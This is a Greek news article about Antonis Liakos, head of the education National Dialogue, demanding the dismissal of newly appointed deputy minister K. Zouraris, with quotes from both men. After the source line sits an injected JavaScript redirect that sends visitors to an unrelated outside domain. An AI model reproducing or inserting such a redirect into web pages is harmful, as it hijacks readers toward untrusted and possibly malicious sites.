Πόλεμος πριν ακόμα ξεκινήσουν- Λιάκος κατά Ζουράρι: Γρήγορα αποπομπή, πριν γίνει διεθνές θέμα

0
17

Πριν ακόμη ο νέος υφυπουργός Παιδείας Κ. Ζουράρις αναλάβει κι επίσημα τη νέα θέση του υφυπουργού Παιδείας, ο Αντώνης Λιάκος ο οποίος είναι πρόεδρος της επιτροπής του Εθνικού Διαλόγου για την Παιδεία, σχολίασε την τηποθέτηση του κ. Ζουράρι ως υφυπουργό Παιδείας: ”Βαζεις έναν τέτοιο τύπο στο υπουργείο Παιδείας; Είμαστε καλά; Γρήγορα αποπομπή, πριν γίνει διεθνές θέμα”.

Τι είχε πει ο κ. Ζουράρις για τον κ. Λιάκο

Υπενθυμίζεται ότι με αφορμή το θέμα των Αρχαίων Ελληνικών και τα όσα είπαν οι έφηβοι βουλευτές στον υπουργό Παιδείας Νίκο Φίλη, ο νέος υφυπουργός Παιδείας, ως Βουλευτής των ΑΝΕΛ, είπε στη Βουλή για τον κ. Λιάκο:

«Εγώ έχω ένα πρόβλημα και δεν είναι ο Φίλης, είναι ο Λιάκος.Δεν τολμά να βάλει ακόμη θέμα βιβλίων λόγω αχρηματίας και δεν θα τυπωθούν τα καινούρια για 4-5 χρόνια.» είχε τονίσει ο Ζουράρις

«Ο Λιάκος είναι το πρόβλημα, με τη θεωρία του που είναι μερική, περί ασυνέχειας του ελληνικού έθνους, ότι δεν υπάρχει έθνος και ότι το έθνος είναι κατασκευή των Βαυαρών μετά τη Γαλλική επανάσταση και το κράτος έκανε τους Έλληνες. Αυτός ο Λιάκος που είναι κλασικός πατριδοκλάστης λέει ότι δεν υπάρχει πατρίδα είναι κατασκευή ιδεολόγημα μετά το 1830.

Τώρα κρύβεται, δεν μπορεί να εκτεθεί απέναντι σε ένα ολόκληρο λαό και έθνος και πολιτισμό καταλαβαίνει πως αυτά θα τον ρίξουν και αυτόν και τους άλλους».

Ωστόσο ο κ.Λιάκος επανήλθε και με νέα ανάρτηση στην οποία ανέφερε:
Δήλωση για τα της Παιδείας: Αταχτη υποχώρηση απέναντι στην Εκκλησία, και αδυναμία χειρισμού του συμβολικού. Η παρουσία του Ζουράρη στο υπουργείο είναι ασύμμετρη με τις υποθέσεις που θα του δώσουν να χειριστεί. Συμβολικά επισκιάζει και τον Υπουργό. Μαζί με τους/τις συνεργάτες μου στο Διάλογο κάναμε ότι καλύτερο μπορούσαμε, αφήνοντας το Πόρισμα με τις προτάσεις μας για εκπαιδευτικές μεταρρυθμίσεις ως παρακαταθήκη για τις επόμενες ηγεσίες του Υπουργείου Παιδείας. Έχω όμως την αίσθηση ότι στον άξονα Πολιτισμός-Παιδείας η κυβέρνηση δεν έχει σαφή προσανατολισμό και ιδέες για το τί πρέπει να κάνει.

Πηγή alfavita.gr setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here